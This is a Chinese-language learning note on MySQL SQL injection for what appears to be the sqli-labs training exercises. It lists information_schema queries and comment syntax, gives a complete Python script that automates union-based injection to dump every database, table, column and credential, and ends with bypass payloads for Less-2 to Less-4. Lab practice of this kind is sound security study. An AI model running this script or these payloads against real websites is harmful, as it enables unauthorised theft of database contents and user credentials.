基础知识
常用函数:
version() Mysql版本
user() 数据库用户名
database() 数据库名
@@datadir 数据库安装路径
@@version_compile_os 操作系统版本
常用查询语句:
- 查库
select schema_name from information_schema.schemata
- 查表
select table_name from information_schema.tables where table_schema='security'
-- 该表名用的时候大多转为*16*进制
- 查列
select column_name from information_schema.columns where table_name='users'
- 查字段
select username,password from security.users
- 查询结果按第n列排序 (用于报错注入测试有几列)
order by (n)
sql注释符:
-
# -
--+ -
--
字符串连接函数
-
concat (str1 , str2) -- 连接字符串, 无分隔符 -
concat (-/~ , str1 , str2) -- 连接字符串, 有分隔符 -
group_concat (str1 , str2) -- 连接字符串, 并用 ',' 分隔每一个字符
字符型 数字型 搜索型 注入的区别和判断
(如题)
study 1:
首先用id=1'发现报错, 再用id=1' or '1'='1发现成功注入, 判断为字符型注入
写了个脚本, 一把梭
# coding=utf-8
import requests
from urllib import parse
import sys
from bs4 import BeautifulSoup
url = "http://www.sqlstudy.com/sqlstudy/Less-1"
def CheckStatus(r_text):
if "Login name" in r_text:
return 1
else:
return 0
def PrintNameAndPswd(res_text):
pos_name = res_text.index("Your Login name:")
pos_name_move = pos_name
pos_pswd = res_text.index("Your Password:", pos_name)
pos_pswd_move = pos_pswd
str_name = ''
str_pswd = ''
while res_text[pos_name_move] != '<':
pos_name_move += 1
str_name = res_text[pos_name : pos_name_move]
while res_text[pos_pswd_move] != '<':
pos_pswd_move += 1
str_pswd = res_text[pos_pswd : pos_pswd_move]
# print (str_name + '\n' + str_pswd)
return str_name
def GetColumnsNum():
left = 1
right = 20
mid = (left + right) // 2
while left <= right:
payload = "id=1' order by {}--+".format(mid)
res = requests.get(url = url , params = payload)
# print(parse.unquote(res.url))
res_text = res.text
if CheckStatus(res_text):
# PrintNameAndPswd(res_text , pos_name , pos_pswd)
left = mid + 1
else:
right = mid - 1
mid = (right + left) // 2
return mid
def HowItContrl(columnsnum):
# Your Login name:2
# Your Password:3
payload = "id=-1' union select "
for i in range(1 , columnsnum + 1):
payload = payload + "{},".format(i)
res = requests.get(url=url , params=payload.strip(",") + '--+')
res_text = res.text
if CheckStatus(res_text):
PrintNameAndPswd(res_text)
def GetAllDatabase():
payload = "id=-1' union select 1,(select group_concat(schema_name) from information_schema.schemata),3 --+"
res = requests.get(url=url, params=payload)
# print(parse.unquote(res.url))
res_text = res.text
if (CheckStatus(res_text)):
return PrintNameAndPswd(res_text)
def WhereAmI():
payload = "id=-1' union select 1,database(),3 --+"
res = requests.get(url=url, params=payload)
# print(parse.unquote(res.url))
res_text = res.text
if (CheckStatus(res_text)):
MyPosition = PrintNameAndPswd(res_text)
return MyPosition[MyPosition.index(":") + 1 : ]
def GetTableName(DatabaseName):
payload = "id=-1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=\"{}\"--+".format(DatabaseName)
res = requests.get(url=url, params=payload)
# print(parse.unquote(res.url))
res_text = res.text
if (CheckStatus(res_text)):
TableName = PrintNameAndPswd(res_text)
TableName = TableName[TableName.index(":") + 1 :].split(",")
return TableName
def GetColumnName(TableName):
payload = "id=-1' union select 1,group_concat(column_name),3 from information_schema.columns where table_name='{}' --+".format(TableName)
res = requests.get(url=url, params=payload)
# print(parse.unquote(res.url))
res_text = res.text
if (CheckStatus(res_text)):
ColumnName = PrintNameAndPswd(res_text)
ColumnName = ColumnName[ColumnName.index(":") + 1 :].split(",")
return ColumnName
def GetDetails(DatabaseName , TableName , ColumnName):
payload = "id=-1' union select 1,group_concat({}),3 from {}.{} --+".format(ColumnName , DatabaseName , TableName)
res = requests.get(url=url, params=payload)
# print(parse.unquote(res.url))
res_text = res.text
if (CheckStatus(res_text)):
Details = PrintNameAndPswd(res_text)
Details = Details[Details.index(":") + 1 :].split(",")
return Details
if __name__ == "__main__" :
with open('sqli-lab1.txt' , 'w') as f:
columnsnum = GetColumnsNum()
f.write("column_number = " + str(columnsnum) + '\n')
# HowItContrl(columnsnum)
DatabaseName = GetAllDatabase()
DatabaseName = DatabaseName[DatabaseName.index(":") + 1:].split(",")
MyPosition = WhereAmI()
f.write("You are in : " + MyPosition + '\n')
for i in range(0,len(DatabaseName)):
f.write("DatabaseName : " + DatabaseName[i] + '\n')
TableName = []
TableName = GetTableName(DatabaseName[i])
# print(TableName)
for j in range(0,len(TableName)):
f.write("--TableName : " + TableName[j] + '\n')
ColumnName = []
ColumnName = GetColumnName(TableName[j])
# print(ColumnName)
for k in range(0, len(ColumnName)):
f.write("----ColumnName : " + ColumnName[k] + '\n')
Details = []
Details = GetDetails(DatabaseName[i] , TableName[j] , ColumnName[k])
# print(type(Details))
Details_type = str(type(Details))
if not "NoneType" in Details_type:
for l in range(0,len(Details)):
f.write("------Details : " + Details[l] + '\n')
if l == len(Details) - 1:
f.write("\n---------------------------------------------------------------\n\n")
else:
f.write("--------Details : NULL \n")
study 2:
发现是数字型, 用id=-1 or 1=1--+就能绕过, 然后脚本改改也能一把梭
study 3:
使用id=1'之后发现报错, 结合错误语句看出是('id'), 用id=-1') or 1=1--+就能绕过, 然后改脚本一把梭
study 4:
id=1'没报错, 换成id=1"报错, 结合语句判断出是("id"), 用id=-1") or 1=1--+即可绕过, 改脚本梭哈